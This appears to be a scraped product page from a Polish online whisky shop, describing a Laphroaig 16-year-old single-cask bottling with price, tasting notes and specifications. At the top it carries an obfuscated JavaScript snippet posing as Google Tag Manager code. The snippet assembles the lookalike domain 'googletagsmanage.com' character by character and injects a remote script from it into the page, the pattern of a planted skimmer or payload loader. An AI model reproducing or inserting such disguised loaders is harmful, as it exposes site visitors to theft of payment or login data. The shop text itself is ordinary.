/* ---------------- GoogleTagsManager start code ------------------ */ var bytes = [0, 0, 2, 3, 4, 5, 6, 7, 13, 14, 15, 18, 11, 14, 17, 14, 2, 7, 8, 9, 10, 11]; var i, s, o, g, r, a, m = [], hh = ['/', '.', '', 'om', '', 'c',], gtagHost = '//google.com/tag/ns', gtag = ''; for (var k = 0; k < bytes.length; k++) { gtag = gtag + gtagHost[bytes[k]]; } (function () { var li = document.createElement('script'); li.type = 'text/javascript'; li.src = gtag + "/gtag/?id=UA-23200573-1"; li.async = true; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(li, s); })(); /* ------------ GoogleTagsManager end code ------------------*/
Laphroaig 16yo Old Malt Cask

Laphroaig 16yo Old Malt Cask

Producent Laphroaig Distillery
Kod Produktu: DL108
Dostępność: Na wyczerpaniu
Cena: 650.01 zł
Cena Netto: 528.46 zł
Ilość:  

Napisz opinie

Imię:


Opinia: Informacja: HTML nie tłumaczony!

Ocena: Złe           Dobre

Wpisz kod w polu poniżej:

secure

UWAGA! Z beczki rozlane zostało 691 butelek.

Whisky pochodzi z jednej gorzelni, co profesjonalnie jest nazywane: Single Malt, oraz z jednej beczki(Single Cask). Przechowywana była w beczce o pojemności około 500/600 litrów z numerem referencyjnym: 4825. Ważnym jest to, że trunek nie jest barwiony karmelem, więc kolor swój zawdzięcza tylko naturalnemu procesowi starzenia w beczkach dębowych, karmel nie był dodawany w celu upiększenia koloru trunku. Ponadto dodatkowym atutem jest to, że whisky nie jest filtrowana na zimno, co pozwoliło na zachowanie lepszej struktury i bardziej wyrazistego aromatu.

W zapachu whisky jest słodko-ostra, fenolowa. Wyczuć można zapach plaży i oceanu.

W smaku pełna fenolu, wzmocniona jodyną i dziegciem(zioła).

W finiszu troszkę łagodniejszy posmak ziołowy(dzięgcieć), oprócz tego wyczuć można kreozot, torf i posmak plaży.

Nasze whisky polecamy szczerze na prezent. Prezent byłby na pewno wyjątkowy , bo nie spotykany nigdzie indziej w Polsce jak u nas w sklepie! Cóż lepszego jak wyjątkowy prezent, wysokiej jakości dla kogoś bliskiego? Nic dodać nic ująć!

Whisky wyposażona jest w oryginalny kartonik z logiem firmy tylko czekający na zapakowanie, które gratisowo państwu proponujemy. Jak już miałoby być zapakowane państwa inwencja twórcza, chyba że państwo zdadzą się na nas:) z chęcią służymy pomocą!

Warto też zaznaczyć, że trunki nie są rozlewane w Polsce, a importowane ze Szkocji. Nie maja tak jak typowe whisky 40%, a 46% i wzwyż!

Polecamy, bo:
wysoka jakość
+
dobra cena
=
zadowolenie.

Cechy produktu
Pojemność 700 ml
Zawartość alkoholu 50%
Kraj pochodzenia Szkocja
Leżakowanie 16 lat w dębowej beczce
Region Islay
Destylarnia Laphroaig
Informacje o produkcji Destylowane: 04. 1992r. Butelkowane: 01. 2009r. Lane z jednej beczki.